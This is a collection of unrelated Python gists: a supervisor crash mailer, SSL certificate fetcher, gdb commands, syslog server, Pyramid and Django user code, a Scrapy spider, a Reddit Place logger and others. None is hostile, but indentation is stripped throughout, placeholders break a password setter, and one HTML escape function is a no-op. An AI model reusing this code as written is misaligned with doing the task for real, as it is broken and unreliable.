from optparse import OptionParser
from supervisor import childutils
class ErrorMailer(object):
def __init__(self, address, processes=None):
self.address = address
self.processes = processes
self.stdin = sys.stdin
self.stdout = sys.stdout
self.mailcmd = "mail"
def run(self):
last_email = {}
while True:
headers, payload = childutils.listener.wait(self.stdin, self.stdout)
if headers['eventname'] not in ('PROCESS_STATE_EXITED', 'PROCESS_LOG_STDERR'):
childutils.listener.ok(self.stdout)
continue
if headers['eventname'] == 'PROCESS_STATE_EXITED':
pheaders, pdata = childutils.eventdata(payload+'\n')
if int(pheaders['expected']):
childutils.listener.ok(self.stdout)
continue
msg = ('Process %(processname)s in group %(groupname)s exited '
'unexpectedly (pid %(pid)s) from state %(from_state)s' %
pheaders)
subject = ' %s crashed at %s' % (pheaders['processname'],
childutils.get_asctime())
# self.stderr.write('unexpected exit, mailing\n')
# self.stderr.flush()
self.mail(subject, msg)
childutils.listener.ok(self.stdout)
else: # PROCESS_LOG_STDERR
pheaders, pdata = childutils.eventdata(payload)
name = pheaders['processname']
now = time.time()
if now - last_email.get(name, 0) < 30:
childutils.listener.ok(self.stdout)
continue
last_email[name] = now
subject = ('Process %(processname)s in group %(groupname)s wrote to stderr'
% pheaders)
# self.stderr.write('wrote to stderr, mailing\n')
# self.stderr.flush()
self.mail(subject, pdata.strip())
childutils.listener.ok(self.stdout)
def mail(self, subject, msg):
fromaddress = "root@localhost"
body = "\r\n".join((
"From: %s" % fromaddress,
"To: %s" % self.address,
"Subject: %s" % subject,
"",
msg,
))
server = smtplib.SMTP('localhost')
server.sendmail(fromaddress, [self.address], body)
server.quit()
def build_parser():
parser = OptionParser(usage="Usage: %prog [options]")
parser.add_option("-p", "--process", dest="processes", help="Process name", action="append")
parser.add_option("-m", "--address", dest="address", help="Email address")
return parser
def main():
parser = build_parser()
options, system = parser.parse_args()
if not options.address:
parser.error("must specify an email address")
prog = ErrorMailer(processes=options.processes, address=options.address)
prog.run()
if __name__ == '__main__':
main()
```
#### File: hard-gists/745868fb26102298e837/snippet.py
```python
import ssl
import sys
import optparse
import ConfigParser
import OpenSSL
def getCertificate(s):
cert_pem = ssl.get_server_certificate((s, 443))
cert_der = ssl.PEM_cert_to_DER_cert(cert_pem)
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_pem)
fingerprint = x509.digest('sha1')
fingerprint = ':'.join(fingerprint[pos:pos+2] for pos in xrange(0,len(fingerprint),2))
subject = x509.get_subject()
print '%-25s %s' %('SHA1 Fingerprint:',fingerprint)
print '%-25s %s' %('Serial Number:',x509.get_serial_number())
print '%-25s %s' %('Common Name:',subject.CN)
print '%-25s %s' %('Organization:',subject.O)
print '%-25s %s' %('Issue Date:',x509.get_notBefore())
print '%-25s %s' %('Expiration Date:', x509.get_notAfter())
cert_out = open(s,'wb')
cert_out.write(cert_pem)
cert_out.close()
def readConfigs(args):
usage = "Usage: python %prog [options] "
parser = optparse.OptionParser(usage=usage)
parser.add_option('--server', '-s', action='store', default=None, help='server to enumnerate')
global options
(options,server) = parser.parse_args(args)
def main(args):
readConfigs(args)
if options.server:
getCertificate(options.server)
if __name__ == "__main__":
args = sys.argv[1:]
if args:
main(args)
else:
print "See help (-h) for details"
sys.exit(0)
```
#### File: hard-gists/7466823/snippet.py
```python
import gdb
INDENT = ' '
class SuperTrace(gdb.Command):
old_stack = []
def __init__(self):
super(SuperTrace, self).__init__("supertrace",
gdb.COMMAND_SUPPORT,
gdb.COMPLETE_NONE)
def supertrace(self):
def backtrace_generator():
f = gdb.newest_frame()
while f is not None:
yield f
f = gdb.Frame.older(f)
fstack = []
f = gdb.newest_frame()
for f in backtrace_generator():
frame_name = gdb.Frame.name(f)
if frame_name is None:
continue
#frame_name = '??'
filename = '??'
line = 0
try:
symtab_and_line = gdb.Frame.find_sal(f)
filename = symtab_and_line.symtab.filename
line = symtab_and_line.line
except:
#continue
pass
args = [
frame_name,
filename,
line,
]
fstack.append(args)
fstack.reverse()
ostack = self.__class__.old_stack
is_print = False
for f in enumerate(fstack):
if f[0] >= len(ostack):
is_print = True
else:
if f[1] != ostack[f[0]]:
is_print = True
if is_print:
print('{}| {} at {}:{}'.format(
INDENT * f[0], f[1][0], f[1][1], f[1][2]))
self.__class__.old_stack = fstack
def invoke(self, arg, from_tty):
#num = 0
#try:
# num = int(arg)
#except Exception:
# pass
try:
self.supertrace()
except Exception as e:
print(str(e))
class LastBreakpoints(gdb.Function):
def __init__(self):
super(LastBreakpoints, self).__init__("lastbp")
def invoke(self):
return len(gdb.breakpoints())
class BreakAll(gdb.Command):
def __init__(self):
super(self.__class__, self).__init__("breakall",
gdb.COMMAND_SUPPORT,
gdb.COMPLETE_NONE)
def filelist(self):
files = set()
raw = gdb.execute('info functions', True, True)
lines = raw.split('\n')
for line in enumerate(lines):
if line[1].startswith('File '):
files.add(line[1][5:line[1].find(':')])
#print '{0:3d}: {1}'.format(line[0], line[1])
return files
def invoke(self, arg, from_tty):
for f in self.filelist():
gdb.execute('rbreak {}:.'.format(f))
SuperTrace()
LastBreakpoints()
BreakAll()
```
#### File: hard-gists/749857/snippet.py
```python
from twisted.internet import reactor, stdio, defer
from twisted.internet.protocol import Protocol, Factory
from twisted.protocols.basic import LineReceiver
import time, re, math, json
#<22>Nov 1 00:12:04 gleicon-vm1 postfix/smtpd[4880]: connect from localhost[127.0.0.1]
severity = ['emerg', 'alert', 'crit', 'err', 'warn', 'notice', 'info', 'debug', ]
facility = ['kern', 'user', 'mail', 'daemon', 'auth', 'syslog', 'lpr', 'news',
'uucp', 'cron', 'authpriv', 'ftp', 'ntp', 'audit', 'alert', 'at', 'local0',
'local1', 'local2', 'local3', 'local4', 'local5', 'local6', 'local7',]
fs_match = re.compile("<(.+)>(.*)", re.I)
class SyslogdProtocol(LineReceiver):
delimiter = '\n'
def connectionMade(self):
print 'Connection from %r' % self.transport
def lineReceived(self, line):
k = {}
k['line'] = line.strip()
(fac, sev) = self._calc_lvl(k['line'])
k['host'] = self.transport.getHost().host
k['tstamp'] = time.time()
k['facility'] = fac
k['severity'] = sev
print json.dumps(k)
def _calc_lvl(self, line):
lvl = fs_match.split(line)
if lvl and len(lvl) > 1:
i = int(lvl[1])
fac = int(math.floor(i / 8))
sev = i - (fac * 8)
return (facility[fac], severity[sev])
return (None, None)
class SyslogdFactory(Factory):
protocol = SyslogdProtocol
def main():
factory = SyslogdFactory()
reactor.listenTCP(25000, factory, 10)
reactor.run()
if __name__ == '__main__':
main()
```
#### File: hard-gists/7540117/snippet.py
```python
from pyramid.security import ALL_PERMISSIONS
from pyramid.security import DENY_ALL
from pyramid.security import Allow
from pyramid.security import Everyone
from sqlalchemy import Column, Integer, Text, Unicode
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker, synonym
from zope.sqlalchemy import ZopeTransactionExtension
import cryptacular.bcrypt
ADMINS = []
DBSession = scoped_session(sessionmaker(extension=ZopeTransactionExtension()))
Base = declarative_base()
crypt = cryptacular.bcrypt.BCRYPTPasswordManager()
def hash_password(password):
return unicode(crypt.encode(password))
def groupfinder(userid, request):
"""callback for authentication policy"""
if userid in ADMINS:
return ['g:admins']
else:
return []
class UserFactory(object):
def __init__(self, request):
self.request = request
def __getitem__(self, key):
user = User.get_by_username(key)
user.__parent__ = self
user.__name__ = key
return user
class User(Base):
@property
def __acl__(self):
return [
(Allow, self.email, 'edit'),
(Allow, 'g:admins', ALL_PERMISSIONS),
(Allow, Everyone, 'view'), #DENY_ALL if no public user view
]
__tablename__ = 'users'
user_id = Column(Integer, primary_key=True)
username = Column(Unicode(20), unique=True)
name = Column(Unicode(50))
email = Column(Unicode(50))
hits = Column(Integer, default=0)
misses = Column(Integer, default=0)
delivered_hits = Column(Integer, default=0)
delivered_misses = Column(Integer, default=0)
_password = Column('password', Unicode(60))
def _get_password(self):
return self._password
def _set_password(self, password):
self._password = <PASSWORD>password(password)
password = property(_get_password, _set_password)
password = synonym('_password', descriptor=password)
def __init__(self, username, password, name, email):
self.username = username
self.name = name
self.email = email
self.password = password
@classmethod
def get_by_username(cls, username):
return DBSession.query(cls).filter(cls.username == username).first()
@classmethod
def check_password(cls, username, password):
user = cls.get_by_username(username)
if not user:
return False
return crypt.check(user.password, password)
```
#### File: hard-gists/756b1d8df2d1487497d29b90e81f8068/snippet.py
```python
import contextlib
import OpenSSL.crypto
import os
import requests
import ssl
import tempfile
@contextlib.contextmanager
def pfx_to_pem(pfx_path, pfx_password):
''' Decrypts the .pfx file to be used with requests. '''
with tempfile.NamedTemporaryFile(suffix='.pem') as t_pem:
f_pem = open(t_pem.name, 'wb')
pfx = open(pfx_path, 'rb').read()
p12 = OpenSSL.crypto.load_pkcs12(pfx, pfx_password)
f_pem.write(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, cert))
f_pem.close()
yield t_pem.name
# HOW TO USE:
# with pfx_to_pem('foo.pem', 'bar') as cert:
# requests.post(url, cert=cert, data=payload)
```
#### File: hard-gists/7578539/snippet.py
```python
from pylab import *
from numpy import *
from numpy.linalg import solve
from scipy.integrate import odeint
from scipy.stats import norm, uniform, beta
from scipy.special import jacobi
a = 0.0
b = 3.0
theta=1.0
sigma=sqrt(theta/(2*(a+b+2)))
tscale = 0.05
invariant_distribution = poly1d( [-1 for x in range(int(a))], True)*poly1d( [1 for x in range(int(b))], True)
def eigenvalue(n):
return theta*n*(n+a+b+1)/(a+b+2)
gaussian_var = norm()
def dW(dt):
return norm.rvs() / sqrt(dt)
def random_walk(y0, tmax, dt, times = None):
dt = dt * tscale
def rhs(y,t):
return -theta*(y-(a-b)/(a+b+2)) + sqrt(2*theta*(1-y*y)/(a+b+2))*dW(dt/tscale)
if (times is None):
times = arange(0,tmax,dt)
y = zeros(shape=times.shape, dtype=float)
y[0] = y0
for i in range(1,y.shape[0]):
y[i] = y[i-1] + rhs(y[i-1], times[i])*dt
if abs(y[i]) > 1:
y[i] = y[i] / abs(y[i])
return (times, y)
def beta_prior(s, f):
return poly1d(ones(shape=(s,)), True)*poly1d(-1*ones(shape=(f,)), True)
def poly_to_jacobi(x):
"""x is a poly1d object"""
xc = x.coeffs
N = x.order+1
matrix = zeros(shape=(N,N), dtype=float)
for i in range(N):
matrix[N-i-1:N, i] = jacobi(i,a,b).coeffs
return solve(matrix, xc)
def jacobi_to_poly(x):
result = poly1d([0])
for i in range(x.shape[0]):
result = result + (jacobi(i,a,b)*invariant_distribution)*x[i]
return result
def jacobi_to_poly_no_invariant(x):
result = poly1d([0])
for i in range(x.shape[0]):
result = result + jacobi(i,a,b)*x[i]
return result
def propagate_jacobi(pc, t):
"""Takes jacobi coefficients and propagates them"""
n = arange(pc.shape[0], dtype=float)
l = theta*n*(n+a+b+1.0)/(a+b+2.0)*tscale
return exp(-l*t)*pc
def truncate_unnecessary_jacobi(p):
p_normalized = p / (abs(p).sum())
cs = cumsum(abs(p_normalized[::-1]))[::-1]
return p_normalized[where(abs(cs) > 1e-4)]
def pde_solve(prior, t):
result = zeros(shape=(t.shape[0], prior.shape[0]), dtype=float)
result[0,:] = prior
for i in range(1,t.shape[0]):
result[i,:] = propagate_jacobi(result[i-1,:], t[i]-t[i-1])
return result
def transform_to_x(pdf, x):
result = zeros(shape=(pdf.shape[0], x.shape[0]), dtype=float)
for i in range(0, pdf.shape[0]):
p = jacobi_to_poly(pdf[i,:])
result[i,:] = p(x)
result[i,:] /= result[i,:].sum()
return result
tmax = 4
prior = beta_prior(40, 20)
prior_in_jacobi = poly_to_jacobi(prior)
dt = 0.1
times = arange(0,tmax,dt)
x = arange(-1,1,0.01)
rw_dt = 0.01
t, y = random_walk(0.35*2-1, tmax, rw_dt)
solution_as_x = zeros(shape=(times.size, x.size), dtype=float)
solution_as_jacobi = None
empirical_ctr = zeros(shape=(4,), dtype=float)
for i in range(0,4):
nt = int(1.0/dt)
prior = prior_in_jacobi
rnd = uniform(0,1)
if (i > 0):
nsamples = 40
r = rnd.rvs(nsamples)
ctr = (y[i/rw_dt]+1)/2.0
print "CTR: " + str(ctr)
success = (r < ctr).sum()
print "Empirical: " + str(success / float(nsamples))
evidence = beta_prior( nsamples - success, success)
prior = None
j = truncate_unnecessary_jacobi(solution_as_jacobi[int(1/dt)-1])
prior = poly_to_jacobi(evidence * jacobi_to_poly_no_invariant(j))
empirical_ctr[i] = success / float(nsamples)
solution_as_jacobi = pde_solve(prior, times[i*nt:(i+1)*nt])
solution_as_x[i*nt:(i+1)*nt] = transform_to_x(solution_as_jacobi, x)
plot(arange(0,4), empirical_ctr, 'go')
plot(t, (y+1)/2.0, 'k')
imshow(solution_as_x.transpose(), origin='lower', extent=[0,tmax,0,1])
xlabel("time")
ylabel("CTR")
title("Bayesian Estimate of CTR")
colorbar()
show()
```
#### File: hard-gists/764262/snippet.py
```python
from __future__ import division
from optparse import OptionParser
from itertools import groupby, izip, count, imap, islice
import re, csv
import MOODS
from collections import defaultdict
def isheader(line):
return line.startswith('>')
def PWMIter(handle):
"""Yields name/PWM"""
num_re = re.compile('\d{1,}')
line_gen = imap(lambda x: x.strip(), handle)
name = None
out = None
for header, lines in groupby(line_gen, isheader):
if header:
name = lines.next()[1:]
else:
out = []
for line in lines:
out.append(map(int, num_re.findall(line)))
yield name, out
def transpose(input):
"""transposes a list-of-lists"""
return map(None, *input)
def ParseHeader(header):
"""Parses the structured header to retrieve relevant info"""
parts = header.split('_')
odict = {}
odict['CHROM'] = parts[1]
odict['START'] = int(parts[2])
odict['STRAND'] = parts[4]
return odict
def ProcessSeqs(SEQ_HANDLE, PWMS, THRESHOLD, WANT_REV = False, bg = None):
"""Yields matches on sequences in an 'interval' formatted dictionary"""
pwm_names = map(lambda x: x[0], PWMS)
pwm_mats = map(lambda x: x[1], PWMS)
thresh = map(lambda x:MOODS.threshold_from_p(x, bg, THRESHOLD), pwm_mats)
for interval in ReadInterval(SEQ_HANDLE):
print interval['NAME']
results = MOODS.search(interval['SEQ'].upper(), pwm_mats, thresh,
both_strands = WANT_REV, algorithm = 'lf',
absolute_threshold = True, bg = bg)
for res, pwm_name, pwm_mat, th in zip(results, pwm_names, pwm_mats, thresh):
width = len(pwm_mat[0])
for position, score in res:
if score > th:
yield {
'NAME':interval['NAME'],
'START':int(interval['START'])+position,
'END':int(interval['START'])+width+position,
'STRAND':interval['STRAND'],
'PWM':pwm_name,
'SCORE':score,
'CHROM':interval['CHROM'],
'SEQ':interval['SEQ'][position:(position+width)].upper()
}
else:
print 'got bad result'
def ReadInterval(handle):
"""Reads an Interval file and returns a list of dicts for each row"""
headers = ('CHROM', 'START', 'END', 'NAME', 'junk', 'STRAND',
'junk7', 'junk8', 'junk9', 'junk10', 'junk11',
'junk12', 'SEQ')
for row in csv.DictReader(handle, fieldnames = headers,
delimiter = '\t'):
yield row
def GetBG(handle):
d = defaultdict(int)
for row in islice(ReadInterval(handle), 10):
for r in row['SEQ'].upper():
d[r] += 1
s = sum(d.values())
return [d['A']/s, d['C']/s, d['G']/s, d['T']/s]
if __name__ == '__main__':
parser = OptionParser()
(options, args) = parser.parse_args()
seqintervalfile = args[0]
jasparfile = args[1]
threshold = args[2]
output_file = args[3]
print 'Getting Background'
with open(jasparfile) as handle:
PWMS = list(PWMIter(handle))
with open(seqintervalfile) as handle:
bg = GetBG(handle)
fields = ('CHROM', 'START', 'END', 'STRAND', 'NAME', 'PWM', 'SCORE', 'SEQ')
with open(output_file, 'w') as handle:
handle.write('#'+'\t'.join(fields) + '\n')
with open(seqintervalfile) as f_handle:
writer = csv.DictWriter(handle, fields, )
for row in ProcessSeqs(f_handle, PWMS, float(threshold), bg = bg):
writer.writerow(row)
```
#### File: hard-gists/7653403/snippet.py
```python
u'''Translate YAML written text to graphviz dot language
Input YAML text like below:
---
employee:
- name
- age
- department ->
- manager -> employee
department:
- name
'''
from __future__ import print_function
import re
import yaml
class Item(list):
def __init__(self, name, iterable=[]):
self.name = name
super(Item, self).__init__(iterable)
def __repr__(self):
return '<{0} {1}>'.format(self.name, super(Item, self).__repr__())
def dot(self):
'''return dot language representation of this object
'''
table = [
u'<table bgcolor="#FAFAFA" border="0" cellborder="1"'
u' cellspacing="0" cellpadding="4">',
u'<tr><td align="center" bgcolor="#CCCCEE" port="f0">',
escape(self.name),
u'</td></tr>',
]
arrows = []
for i, v in enumerate(self, 1):
mobj = re.match(r'^(.+)\s*->\s*(.+)?$', v, re.UNICODE)
if mobj:
v, arrow_to = mobj.groups()
if arrow_to is None:
arrow_to = v
v = v.strip()
arrow_to = arrow_to.strip()
arrows.append(u'"{name}":f{i} -> "{arrow_to}" []'.format(
name=escape(self.name), i=i, arrow_to=escape(arrow_to)))
table.extend([
u'<tr><td align="left" balign="left" port="f{}">'.format(i),
br(escape(v)),
u'</td></tr>',
])
table.append(u'</table>')
return u'\n'.join([
u'{} ['.format(escape(self.name)),
u' label = <{}>'.format('\n'.join(table)),
u']',
u'\n'.join(arrows),
])
def quote(s):
if not isinstance(s, basestring):
s = str(s)
return u'"%{}"'.format(s.replace(u'"', u'\\"'))
def escape(s):
if isinstance(s, list):
s = u',\n'.join(s)
elif not isinstance(s, basestring):
s = str(s)
return s.replace(u'&', u'&') \
.replace(u'>', u'>') \
.replace(u'<', u'<')
def br(s):
if not isinstance(s, basestring):
s = str(s)
return s.replace(u'\n', u'<br />')
def yaml_to_dot(yml):
items = [Item(name, contents) for name, contents in yaml.load(yml).items()]
dots = [
u'digraph g {',
u'graph [',
u' rankdir = "LR"',
u']',
u'node [',
# TODO: allow to customize fontsize
u' fontsize = "12"',
u' shape = "plaintext"',
u']',
u'',
]
dots.extend(item.dot() for item in items)
dots.append('}')
return u'\n'.join(dots)
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
input = open(sys.argv[1], 'r')
else:
input = sys.stdin
print(yaml_to_dot(input).encode('utf-8'))
```
#### File: hard-gists/7671688/snippet.py
```python
import idaapi
import idc
import ctypes
import re
print "Importing CopyEA"
def Paste( data ):
strcpy = ctypes.cdll.msvcrt.strcpy
ocb = ctypes.windll.user32.OpenClipboard #Basic Clipboard functions
ecb = ctypes.windll.user32.EmptyClipboard
gcd = ctypes.windll.user32.GetClipboardData
scd = ctypes.windll.user32.SetClipboardData
ccb = ctypes.windll.user32.CloseClipboard
ga = ctypes.windll.kernel32.GlobalAlloc # Global Memory allocation
gl = ctypes.windll.kernel32.GlobalLock # Global Memory Locking
gul = ctypes.windll.kernel32.GlobalUnlock
GMEM_DDESHARE = 0x2000
ocb(None) # Open Clip, Default task
ecb()
hCd = ga( GMEM_DDESHARE, len(data)+1 )
pchData = gl(hCd)
strcpy(ctypes.c_char_p(pchData),data)
gul(hCd)
scd(1,hCd)
ccb()
def CopyEA():
myModuleName = idc.GetInputFile()
MyModuleShortName = re.sub(r'\.[^.]*$','',myModuleName)
myModuleBase = idaapi.get_imagebase()
myOffset = idc.ScreenEA() - myModuleBase
pasteStr = "bp !%s + 0x%x" % (MyModuleShortName, myOffset)
print pasteStr
Paste(pasteStr)
def start_up():
print "CopyEA Start_up is started..."
COPYHOTKEY = 'z'
print "Press '%s' to copy location of effective address to clipboard()"%COPYHOTKEY
idaapi.CompileLine('static _copy_ea() { RunPythonStatement("CopyEA()"); }')
idaapi.add_hotkey(COPYHOTKEY,CopyEA)
start_up()
```
#### File: hard-gists/76877c8f262de24becc081ad96759730/snippet.py
```python
import requests
import re
import sys
import time
import json
import sqlite3
from websocket import create_connection, WebSocket
colors = [
"#FFFFFF",
"#E4E4E4",
"#888888",
"#222222",
"#FFA7D1",
"#E50000",
"#E59500",
"#A06A42",
"#E5D900",
"#94E044",
"#02BE01",
"#00D3DD",
"#0083C7",
"#0000EA",
"#CF6EE4",
"#820080"
]
class PlaceWebSocket(WebSocket):
def recv_frame(self):
frame = super().recv_frame()
return json.loads(frame.data.decode('utf-8'))
def db_connect(db_name):
conn = sqlite3.connect(db_name)
c = conn.cursor()
c.execute(
'''CREATE TABLE IF NOT EXISTS placements (
recieved_on INTEGER,
y INTEGER,
x INTEGER,
color INTEGER,
author TEXT
)''')
c.execute(
'''CREATE TABLE IF NOT EXISTS activity (
recieved_on INTEGER,
count INTEGER
)''')
c.execute(
'''CREATE TABLE IF NOT EXISTS starting_bitmaps (
recieved_on INTEGER,
data BLOB
)''')
c.execute('CREATE INDEX IF NOT EXISTS placements_recieved_on_idx ON placements (recieved_on)')
c.execute('CREATE INDEX IF NOT EXISTS placements_author_idx ON placements (author)')
c.execute('CREATE INDEX IF NOT EXISTS placements_color_idx ON placements (color)')
c.execute('CREATE INDEX IF NOT EXISTS activity_recieved_on_idx ON activity (recieved_on)')
conn.commit()
return c, conn
def save_bitmap(c, conn):
resp = requests.get('https://www.reddit.com/api/place/board-bitmap')
c.execute('''INSERT INTO starting_bitmaps VALUES (?, ?)''', [
int(time.time()),
resp.content
])
conn.commit()
def get_place_url():
match = None
while match is None:
resp = requests.get('https://reddit.com/r/place')
url_re = re.compile(r'"place_websocket_url": "([^,]+)"') # Forgive me, for I am a sinner
matches = re.findall(url_re, resp.content.decode('utf-8'))
if len(matches) > 0:
match = matches[0]
return match
def main():
url = get_place_url()
ws = create_connection(url, class_=PlaceWebSocket)
c, conn = db_connect('place.sqlite')
save_bitmap(c, conn)
insert_queue = 0
inserted_count = 0
max_queue_size = 100
save_frame_per = 20000
while True:
try:
frame = ws.recv_frame()
print(frame)
if frame['type'] == 'place':
c.execute('''INSERT INTO placements VALUES (?, ?, ?, ?, ?)''', [
int(time.time()),
frame['payload']['x'],
frame['payload']['y'],
frame['payload']['color'],
frame['payload']['author']
])
insert_queue += 1
inserted_count += 1
elif frame['type'] == 'activity':
c.execute('''INSERT INTO activity VALUES (?, ?)''', [
int(time.time()),
frame['payload']['count']
])
insert_queue += 1
inserted_count += 1
if insert_queue >= max_queue_size:
conn.commit()
insert_queue = 0
if inserted_count % save_frame_per == 0:
save_bitmap(c, conn)
except KeyboardInterrupt:
print('Exiting safely...')
conn.commit()
conn.close()
sys.exit()
except Exception as e:
print('Error occured: {}'.format(str(e)))
if __name__ == '__main__':
main()
```
#### File: hard-gists/7698491/snippet.py
```python
import clipboard
import editor
import console
import re
import os
from new_from_gist import download_gist
class InvalidGistURLError (Exception): pass
class MultipleFilesInGistError (Exception): pass
class NoFilesInGistError (Exception): pass
class GistDownloadError (Exception): pass
def first_url_from_comments(wholetext):
first_url = ''
for line in wholetext.splitlines():
comment = re.findall(r"^#", line)
if comment:
match = re.findall(r"htt", line)
if match:
first_url = line[line.find('htt'):].split()[0]
break
return first_url
def main():
foo = editor.get_text()
gist_url = first_url_from_comments(foo)
try:
filename, content = download_gist(gist_url)
editor.replace_text(0,len(editor.get_text()),content)
#else:
#editor.make_new_file(filename, content)
except InvalidGistURLError:
console.alert('No Gist URL',
'The clipboard doesn\'t seem to contain a valid Gist URL.',
'OK')
except MultipleFilesInGistError:
console.alert('Multiple Files', 'This Gist contains multiple ' +
'Python files, which isn\'t currently supported.')
except NoFilesInGistError:
console.alert('No Python Files', 'This Gist contains no Python files.')
except GistDownloadError:
console.alert('Error', 'The Gist could not be downloaded.')
if __name__ == '__main__':
main()
```
#### File: hard-gists/76fa64ee8380763871ab/snippet.py
```python
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import Selector
from scrapy.http.request import Request
from scrapy_tutorial.items import ScrapyTutorialItem
class IMDbDetailsPageSpider(CrawlSpider):
name = "imdbdetailspage"
allowed_domains = ["imdb.com"]
start_urls = [
"http://www.imdb.com/search/title?count=20&start=1&title_type=feature,tv_series"
]
rules = (
# Extract links for next pages
Rule(SgmlLinkExtractor(allow=(), restrict_xpaths=('//div[contains(@class, "leftright")][1]//a[contains(., "Next")]')), callback='parse_listings', follow=True),
)
def parse_start_url(self, response):
'''
Crawl start URLs
'''
return self.parse_listings(response)
def parse_listings(self, response):
'''
Extract data from listing pages
'''
sel = Selector(response)
films = sel.xpath('//table[contains(@class, "results")]//tr[contains(@class, "detailed")]')
for film in films:
rating = film.xpath('.//span[contains(@class, "rating-rating")]/span[contains(@class, "value")]/text()').extract()
rating = self.__normalise(rating)
rating = self.__to_float(rating)
# Get films with rating of 8.0 and above
if rating > 8:
film_url = film.xpath('.//td[contains(@class, "title")]/a/@href').extract()
film_url = self.__normalise(film_url)
film_url = self.__to_absolute_url(response.url, film_url)
yield Request(film_url, callback=self.parse_details)
def parse_details(self, response):
'''
Extract data from details pages
'''
sel = Selector(response)
film = sel.xpath('//div[@id="content-2-wide"]')
# Populate film fields
item = ScrapyTutorialItem()
item['title'] = film.xpath('.//h1/span[contains(@class, "itemprop")]/text()').extract()
item['year'] = film.xpath('.//div[@id="ratingWidget"]/p[1]/strong/following-sibling::node()').extract()
item['rating'] = film.xpath('.//span[@itemprop="ratingValue"]/text()').extract()
item['num_of_nominations'] = film.xpath('.//*[@itemprop="awards"][contains(., "nominations")]/text()').extract()
item['description'] = film.xpath('.//p[@itemprop="description"]/text()').extract()
item['poster_url'] = film.xpath('.//*[@id="img_primary"]//img/@src').extract()
item['film_url'] = response.url
item = self.__normalise_item(item, response.url)
# Get films with at least 5 award nominations
if item['num_of_nominations'] >= 5:
return item
def __normalise_item(self, item, base_url):
'''
Standardise and format item fields
'''
# Loop item fields to sanitise data and standardise data types
for key, value in vars(item).values()[0].iteritems():
item[key] = self.__normalise(item[key])
# Clean year and convert year from string to float
item['year'] = item['year'].strip('()')
item['type'] = 'Movie'
if len(item['year']) > 4:
item['type'] = 'TV Series'
item['year'] = item['year'][0:4]
item['year'] = self.__to_int(item['year'])
# Convert rating from string to float
item['rating'] = self.__to_float(item['rating'])
# Convert no. of nominations from string to int
if item['num_of_nominations']:
item['num_of_nominations'] = item['num_of_nominations'].split('&')[1]
item['num_of_nominations'] = [int(s) for s in item['num_of_nominations'].split() if s.isdigit()][0]
else:
item['num_of_nominations'] = 0
# Convert film URL from relative to absolute URL
item['film_url'] = self.__to_absolute_url(base_url, item['film_url'])
return item
def __normalise(self, value):
# Convert list to string
value = value if type(value) is not list else ' '.join(value)
# Trim leading and trailing special characters (Whitespaces, newlines, spaces, tabs, carriage returns)
value = value.strip()
return value
def __to_absolute_url(self, base_url, link):
'''
Convert relative URL to absolute URL
'''
import urlparse
link = urlparse.urljoin(base_url, link)
return link
def __to_int(self, value):
'''
Convert value to integer type
'''
try:
value = int(value)
except ValueError:
value = 0
return value
def __to_float(self, value):
'''
Convert value to float type
'''
try:
value = float(value)
except ValueError:
value = 0.0
return value
```
#### File: hard-gists/7703144/snippet.py
```python
from contextlib import contextmanager
from django.conf import settings
from django.db import connection
@contextmanager
def no_queries_allowed():
"""This is a helper method that makes it easier during development, by
throwing an exception when any queries are made within its block. Using
an ORM, it's sometimes hard to discover what statements lead to implicit
queries. Wrapping this contextmanager around such blocks makes sure that
this cannot happen.
This is only works in debug mode, as in non-debug mode the
connection.queries list isn't available for inspection. In production,
this is a no-op.
"""
if settings.DEBUG:
queries = connection.queries
num_queries = len(queries)
yield
if settings.DEBUG:
assert num_queries == len(queries), \
"A query was made, but this was explicitly forbidden! " \
"Queries were: {}".format(queries[num_queries:])
```
#### File: hard-gists/771052/snippet.py
```python
import re
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class UniqueUserEmailField(forms.EmailField):
"""
An EmailField which only is valid if no User has that email.
"""
def validate(self, value):
super(forms.EmailField, self).validate(value)
try:
User.objects.get(email = value)
raise forms.ValidationError("Email already exists")
except User.MultipleObjectsReturned:
raise forms.ValidationError("Email already exists")
except User.DoesNotExist:
pass
class ExtendedUserCreationForm(UserCreationForm):
"""
Extends the built in UserCreationForm in several ways:
* Adds an email field, which uses the custom UniqueUserEmailField,
that is, the form does not validate if the email address already exists
in the User table.
* The username field is generated based on the email, and isn't visible.
* first_name and last_name fields are added.
* Data not saved by the default behavior of UserCreationForm is saved.
"""
username = forms.CharField(required = False, max_length = 30)
email = UniqueUserEmailField(required = True, label = 'Email address')
first_name = forms.CharField(required = True, max_length = 30)
last_name = forms.CharField(required = True, max_length = 30)
def __init__(self, *args, **kwargs):
"""
Changes the order of fields, and removes the username field.
"""
super(UserCreationForm, self).__init__(*args, **kwargs)
self.fields.keyOrder = ['email', 'first_name', 'last_name',
'<PASSWORD>', '<PASSWORD>']
def __generate_username(self, email):
"""
A simple way of deriving a username from an email address.
Hat tip: http://bit.ly/eIUR5R
>>> User.objects.all().order_by('-id')[0].id
1
>>> self.__generate_username("<EMAIL>")
abcabc2
>>> self.__generate_username("<EMAIL>")
heysup3
"""
# TODO: Something more efficient?
highest_user_id = User.objects.all().order_by('-id')[0].id
leading_part_of_email = email.split('@',1)[0]
leading_part_of_email = re.sub(r'[^a-zA-Z0-9+]', '',
leading_part_of_email)
truncated_part_of_email = leading_part_of_email[:3] \
+ leading_part_of_email[-3:]
derived_username = truncated_part_of_email + str(highest_user_id+1)
return derived_username
def clean(self, *args, **kwargs):
"""
Normal cleanup + username generation.
"""
cleaned_data = super(UserCreationForm, self).clean(*args, **kwargs)
if cleaned_data.has_key('email'):
cleaned_data['username'] = self.__generate_username(
cleaned_data['email'])
return cleaned_data
def save(self, commit=True):
"""
Saves the email, first_name and last_name properties, after the normal
save behavior is complete.
"""
user = super(UserCreationForm, self).save(commit)
if user:
user.email = self.cleaned_data['email']
user.first_name = self.cleaned_data['first_name']
user.last_name = self.cleaned_data['last_name']
